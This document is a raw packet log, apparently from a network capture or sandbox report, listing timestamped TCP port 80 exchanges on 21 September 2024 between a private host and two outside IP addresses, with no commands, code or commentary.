                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.137471914 CEST4970880192.168.2.9147.45.44.104
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.137486935 CEST8049708147.45.44.104192.168.2.9
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.137499094 CEST4970880192.168.2.9147.45.44.104
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.137531996 CEST4970880192.168.2.9147.45.44.104
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.137592077 CEST8049708147.45.44.104192.168.2.9
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.137624979 CEST8049708147.45.44.104192.168.2.9
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.137640953 CEST4970880192.168.2.9147.45.44.104
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.137659073 CEST8049708147.45.44.104192.168.2.9
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.137671947 CEST4970880192.168.2.9147.45.44.104
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.137691975 CEST8049708147.45.44.104192.168.2.9
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.137701988 CEST4970880192.168.2.9147.45.44.104
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.137725115 CEST8049708147.45.44.104192.168.2.9
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.137734890 CEST4970880192.168.2.9147.45.44.104
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.137758017 CEST8049708147.45.44.104192.168.2.9
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.137770891 CEST4970880192.168.2.9147.45.44.104
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.137800932 CEST4970880192.168.2.9147.45.44.104
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.138319969 CEST8049708147.45.44.104192.168.2.9
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.138370991 CEST8049708147.45.44.104192.168.2.9
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.138382912 CEST4970880192.168.2.9147.45.44.104
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.138408899 CEST8049708147.45.44.104192.168.2.9
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.138411999 CEST4970880192.168.2.9147.45.44.104
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.138448000 CEST8049708147.45.44.104192.168.2.9
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.138462067 CEST4970880192.168.2.9147.45.44.104
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.138480902 CEST8049708147.45.44.104192.168.2.9
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.138489008 CEST4970880192.168.2.9147.45.44.104
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.138513088 CEST8049708147.45.44.104192.168.2.9
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.138525009 CEST4970880192.168.2.9147.45.44.104
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.138546944 CEST8049708147.45.44.104192.168.2.9
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.138556004 CEST4970880192.168.2.9147.45.44.104
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.138578892 CEST8049708147.45.44.104192.168.2.9
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.138587952 CEST4970880192.168.2.9147.45.44.104
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.138647079 CEST4970880192.168.2.9147.45.44.104
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.138664961 CEST8049708147.45.44.104192.168.2.9
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.138698101 CEST8049708147.45.44.104192.168.2.9
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.138717890 CEST4970880192.168.2.9147.45.44.104
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.138731003 CEST8049708147.45.44.104192.168.2.9
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.138741970 CEST4970880192.168.2.9147.45.44.104
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.138771057 CEST4970880192.168.2.9147.45.44.104
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.138839960 CEST8049708147.45.44.104192.168.2.9
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.138871908 CEST8049708147.45.44.104192.168.2.9
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.138895988 CEST4970880192.168.2.9147.45.44.104
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.138905048 CEST8049708147.45.44.104192.168.2.9
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.138915062 CEST4970880192.168.2.9147.45.44.104
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.138936043 CEST8049708147.45.44.104192.168.2.9
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.138950109 CEST4970880192.168.2.9147.45.44.104
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.138978958 CEST4970880192.168.2.9147.45.44.104
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.138987064 CEST8049708147.45.44.104192.168.2.9
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.139020920 CEST8049708147.45.44.104192.168.2.9
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.139030933 CEST4970880192.168.2.9147.45.44.104
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.139055014 CEST8049708147.45.44.104192.168.2.9
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.139064074 CEST4970880192.168.2.9147.45.44.104
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.139087915 CEST8049708147.45.44.104192.168.2.9
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.139096975 CEST4970880192.168.2.9147.45.44.104
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.139121056 CEST8049708147.45.44.104192.168.2.9
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.139131069 CEST4970880192.168.2.9147.45.44.104
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.139153957 CEST8049708147.45.44.104192.168.2.9
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.139162064 CEST4970880192.168.2.9147.45.44.104
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.139187098 CEST8049708147.45.44.104192.168.2.9
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.139200926 CEST4970880192.168.2.9147.45.44.104
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.139220953 CEST8049708147.45.44.104192.168.2.9
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.139230013 CEST4970880192.168.2.9147.45.44.104
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.139255047 CEST8049708147.45.44.104192.168.2.9
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.139266014 CEST4970880192.168.2.9147.45.44.104
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.139287949 CEST8049708147.45.44.104192.168.2.9
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.139297962 CEST4970880192.168.2.9147.45.44.104
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.139326096 CEST8049708147.45.44.104192.168.2.9
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.139334917 CEST4970880192.168.2.9147.45.44.104
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.139362097 CEST8049708147.45.44.104192.168.2.9
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.139365911 CEST4970880192.168.2.9147.45.44.104
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.139406919 CEST8049708147.45.44.104192.168.2.9
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.139408112 CEST4970880192.168.2.9147.45.44.104
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.139453888 CEST4970880192.168.2.9147.45.44.104
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.139751911 CEST4970880192.168.2.9147.45.44.104
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.144038916 CEST8049712176.113.115.33192.168.2.9
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.144102097 CEST8049712176.113.115.33192.168.2.9
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.144136906 CEST8049712176.113.115.33192.168.2.9
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.144237995 CEST4971280192.168.2.9176.113.115.33
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.144237995 CEST4971280192.168.2.9176.113.115.33
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.144678116 CEST8049712176.113.115.33192.168.2.9
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.144711018 CEST8049712176.113.115.33192.168.2.9
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.144743919 CEST8049712176.113.115.33192.168.2.9
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.144777060 CEST8049712176.113.115.33192.168.2.9
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.144815922 CEST8049712176.113.115.33192.168.2.9
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.144835949 CEST4971280192.168.2.9176.113.115.33
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.144835949 CEST4971280192.168.2.9176.113.115.33
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.144865990 CEST8049712176.113.115.33192.168.2.9
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.144869089 CEST4971280192.168.2.9176.113.115.33
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.144898891 CEST8049712176.113.115.33192.168.2.9
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.144931078 CEST8049712176.113.115.33192.168.2.9
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.144944906 CEST4971280192.168.2.9176.113.115.33
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.144946098 CEST4971280192.168.2.9176.113.115.33
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.144964933 CEST8049712176.113.115.33192.168.2.9
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.144999027 CEST8049712176.113.115.33192.168.2.9
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.145011902 CEST4971280192.168.2.9176.113.115.33
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.145011902 CEST4971280192.168.2.9176.113.115.33
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.145030975 CEST8049712176.113.115.33192.168.2.9
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.145062923 CEST8049712176.113.115.33192.168.2.9
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.145078897 CEST4971280192.168.2.9176.113.115.33
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.145078897 CEST4971280192.168.2.9176.113.115.33
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.145096064 CEST8049712176.113.115.33192.168.2.9
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.145148993 CEST4971280192.168.2.9176.113.115.33
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.145148993 CEST4971280192.168.2.9176.113.115.33
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.145176888 CEST8049712176.113.115.33192.168.2.9
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.145210981 CEST8049712176.113.115.33192.168.2.9
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.145256042 CEST4971280192.168.2.9176.113.115.33
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.145256042 CEST4971280192.168.2.9176.113.115.33
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.145648003 CEST8049712176.113.115.33192.168.2.9
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.145682096 CEST8049712176.113.115.33192.168.2.9
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.145714045 CEST8049712176.113.115.33192.168.2.9
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.145735025 CEST4971280192.168.2.9176.113.115.33
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.145750046 CEST8049712176.113.115.33192.168.2.9
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.145760059 CEST4971280192.168.2.9176.113.115.33
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.145775080 CEST4971280192.168.2.9176.113.115.33
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.145782948 CEST8049712176.113.115.33192.168.2.9
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.145816088 CEST8049712176.113.115.33192.168.2.9
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.145828962 CEST4971280192.168.2.9176.113.115.33
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.145828962 CEST4971280192.168.2.9176.113.115.33
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.145849943 CEST8049712176.113.115.33192.168.2.9
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.145870924 CEST4971280192.168.2.9176.113.115.33
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.145883083 CEST8049712176.113.115.33192.168.2.9
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.145916939 CEST8049712176.113.115.33192.168.2.9
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.145924091 CEST4971280192.168.2.9176.113.115.33
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.145925045 CEST4971280192.168.2.9176.113.115.33
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.145947933 CEST8049712176.113.115.33192.168.2.9
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.145971060 CEST4971280192.168.2.9176.113.115.33
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.145982027 CEST8049712176.113.115.33192.168.2.9
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.146013975 CEST8049712176.113.115.33192.168.2.9
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.146035910 CEST4971280192.168.2.9176.113.115.33
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.146035910 CEST4971280192.168.2.9176.113.115.33
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.146044970 CEST8049712176.113.115.33192.168.2.9
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.146078110 CEST8049712176.113.115.33192.168.2.9
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.146090984 CEST4971280192.168.2.9176.113.115.33
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.146090984 CEST4971280192.168.2.9176.113.115.33
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.146126032 CEST4971280192.168.2.9176.113.115.33
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.146703959 CEST8049712176.113.115.33192.168.2.9
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.146738052 CEST8049712176.113.115.33192.168.2.9
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.146770000 CEST8049712176.113.115.33192.168.2.9
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.146778107 CEST4971280192.168.2.9176.113.115.33
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.146806002 CEST8049712176.113.115.33192.168.2.9
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.146811962 CEST4971280192.168.2.9176.113.115.33
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.146811962 CEST4971280192.168.2.9176.113.115.33
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.146838903 CEST8049712176.113.115.33192.168.2.9
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.146872997 CEST8049712176.113.115.33192.168.2.9
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.146887064 CEST4971280192.168.2.9176.113.115.33
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.146887064 CEST4971280192.168.2.9176.113.115.33
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.146905899 CEST8049712176.113.115.33192.168.2.9
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.146939993 CEST4971280192.168.2.9176.113.115.33
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.146940947 CEST8049712176.113.115.33192.168.2.9
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.146975994 CEST8049712176.113.115.33192.168.2.9
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.146991968 CEST4971280192.168.2.9176.113.115.33
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.146991968 CEST4971280192.168.2.9176.113.115.33
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.147037029 CEST4971280192.168.2.9176.113.115.33
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.147249937 CEST8049709147.45.44.104192.168.2.9
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.147325993 CEST8049709147.45.44.104192.168.2.9
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.147349119 CEST4970980192.168.2.9147.45.44.104
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.147360086 CEST8049709147.45.44.104192.168.2.9
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.147389889 CEST4970980192.168.2.9147.45.44.104
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.147404909 CEST4970980192.168.2.9147.45.44.104
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.147412062 CEST8049709147.45.44.104192.168.2.9
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.147445917 CEST8049709147.45.44.104192.168.2.9
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.147459030 CEST4970980192.168.2.9147.45.44.104
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.147480965 CEST8049709147.45.44.104192.168.2.9
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.147486925 CEST4970980192.168.2.9147.45.44.104
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.147515059 CEST8049709147.45.44.104192.168.2.9
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.147536993 CEST4970980192.168.2.9147.45.44.104
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.147547960 CEST8049709147.45.44.104192.168.2.9
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.147582054 CEST8049709147.45.44.104192.168.2.9
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.147603035 CEST4970980192.168.2.9147.45.44.104
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.147614002 CEST8049709147.45.44.104192.168.2.9
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.147635937 CEST4970980192.168.2.9147.45.44.104
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.147648096 CEST8049709147.45.44.104192.168.2.9
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.147670984 CEST4970980192.168.2.9147.45.44.104
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.147680998 CEST8049709147.45.44.104192.168.2.9
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.147715092 CEST8049709147.45.44.104192.168.2.9
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.147742987 CEST4970980192.168.2.9147.45.44.104
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.147748947 CEST8049709147.45.44.104192.168.2.9
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.147770882 CEST4970980192.168.2.9147.45.44.104
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.147811890 CEST4970980192.168.2.9147.45.44.104
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.148441076 CEST8049709147.45.44.104192.168.2.9
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.148474932 CEST8049709147.45.44.104192.168.2.9
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.148510933 CEST4970980192.168.2.9147.45.44.104
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.148525953 CEST8049709147.45.44.104192.168.2.9
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.148550987 CEST4970980192.168.2.9147.45.44.104
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.148560047 CEST8049709147.45.44.104192.168.2.9
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.148593903 CEST8049709147.45.44.104192.168.2.9
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.148602009 CEST4970980192.168.2.9147.45.44.104
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.148627043 CEST8049709147.45.44.104192.168.2.9
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.148649931 CEST4970980192.168.2.9147.45.44.104
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.148660898 CEST8049709147.45.44.104192.168.2.9
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.148679018 CEST4970980192.168.2.9147.45.44.104
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.148694038 CEST8049709147.45.44.104192.168.2.9
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.148715973 CEST4970980192.168.2.9147.45.44.104
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.148727894 CEST8049709147.45.44.104192.168.2.9
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.148746967 CEST4970980192.168.2.9147.45.44.104
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.148761988 CEST8049709147.45.44.104192.168.2.9
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.148766994 CEST4970980192.168.2.9147.45.44.104
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.148796082 CEST8049709147.45.44.104192.168.2.9
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.148808002 CEST4970980192.168.2.9147.45.44.104
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.148830891 CEST8049709147.45.44.104192.168.2.9
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.148853064 CEST4970980192.168.2.9147.45.44.104
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.148864985 CEST8049709147.45.44.104192.168.2.9
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.148888111 CEST4970980192.168.2.9147.45.44.104
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.148897886 CEST8049709147.45.44.104192.168.2.9
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.148919106 CEST4970980192.168.2.9147.45.44.104
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.148931980 CEST8049709147.45.44.104192.168.2.9
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.148953915 CEST4970980192.168.2.9147.45.44.104
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.148966074 CEST8049709147.45.44.104192.168.2.9
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.148988008 CEST4970980192.168.2.9147.45.44.104
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.148998976 CEST8049709147.45.44.104192.168.2.9
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.149023056 CEST4970980192.168.2.9147.45.44.104
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.149038076 CEST8049709147.45.44.104192.168.2.9
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.149063110 CEST4970980192.168.2.9147.45.44.104
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.149072886 CEST8049709147.45.44.104192.168.2.9
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.149082899 CEST4970980192.168.2.9147.45.44.104
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.149111986 CEST4970980192.168.2.9147.45.44.104
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.149126053 CEST8049709147.45.44.104192.168.2.9
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.149158955 CEST8049709147.45.44.104192.168.2.9
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.149175882 CEST4970980192.168.2.9147.45.44.104
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.149194002 CEST8049709147.45.44.104192.168.2.9
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.149211884 CEST4970980192.168.2.9147.45.44.104
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.149226904 CEST8049709147.45.44.104192.168.2.9
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.149239063 CEST4970980192.168.2.9147.45.44.104
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.149261951 CEST8049709147.45.44.104192.168.2.9
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.149271011 CEST4970980192.168.2.9147.45.44.104
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.149296999 CEST8049709147.45.44.104192.168.2.9
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.149319887 CEST4970980192.168.2.9147.45.44.104
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.149348021 CEST8049709147.45.44.104192.168.2.9
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.149360895 CEST4970980192.168.2.9147.45.44.104
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.149383068 CEST8049709147.45.44.104192.168.2.9
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.149390936 CEST4970980192.168.2.9147.45.44.104
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.149415970 CEST8049709147.45.44.104192.168.2.9
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.149441004 CEST4970980192.168.2.9147.45.44.104
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.149483919 CEST4970980192.168.2.9147.45.44.104
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.149493933 CEST8049709147.45.44.104192.168.2.9
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.149528980 CEST8049709147.45.44.104192.168.2.9
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.149535894 CEST4970980192.168.2.9147.45.44.104
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.149560928 CEST8049709147.45.44.104192.168.2.9
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.149573088 CEST4970980192.168.2.9147.45.44.104
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.149596930 CEST8049709147.45.44.104192.168.2.9
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.149620056 CEST4970980192.168.2.9147.45.44.104
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.149630070 CEST8049709147.45.44.104192.168.2.9
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.149653912 CEST4970980192.168.2.9147.45.44.104
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.149666071 CEST8049709147.45.44.104192.168.2.9
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.149689913 CEST4970980192.168.2.9147.45.44.104
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.149698973 CEST8049709147.45.44.104192.168.2.9
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.149734974 CEST8049709147.45.44.104192.168.2.9
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.149755001 CEST4970980192.168.2.9147.45.44.104
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.149764061 CEST8049709147.45.44.104192.168.2.9
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.149781942 CEST4970980192.168.2.9147.45.44.104
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.149796963 CEST8049709147.45.44.104192.168.2.9
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.149812937 CEST4970980192.168.2.9147.45.44.104
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.149831057 CEST8049709147.45.44.104192.168.2.9
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.149861097 CEST4970980192.168.2.9147.45.44.104
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.149862051 CEST8049709147.45.44.104192.168.2.9
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.149885893 CEST4970980192.168.2.9147.45.44.104
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.149910927 CEST8049709147.45.44.104192.168.2.9
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.149933100 CEST4970980192.168.2.9147.45.44.104
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.149946928 CEST8049709147.45.44.104192.168.2.9
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.149959087 CEST4970980192.168.2.9147.45.44.104
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.149981022 CEST8049709147.45.44.104192.168.2.9
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.149991035 CEST4970980192.168.2.9147.45.44.104
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.150017023 CEST8049709147.45.44.104192.168.2.9
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.150042057 CEST4970980192.168.2.9147.45.44.104
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.150049925 CEST8049709147.45.44.104192.168.2.9
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.150059938 CEST4970980192.168.2.9147.45.44.104
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.150084972 CEST8049709147.45.44.104192.168.2.9
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.150089979 CEST4970980192.168.2.9147.45.44.104
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.150120020 CEST8049709147.45.44.104192.168.2.9
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.150129080 CEST4970980192.168.2.9147.45.44.104
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.150162935 CEST4970980192.168.2.9147.45.44.104
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.150980949 CEST8049709147.45.44.104192.168.2.9
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.151015043 CEST8049709147.45.44.104192.168.2.9
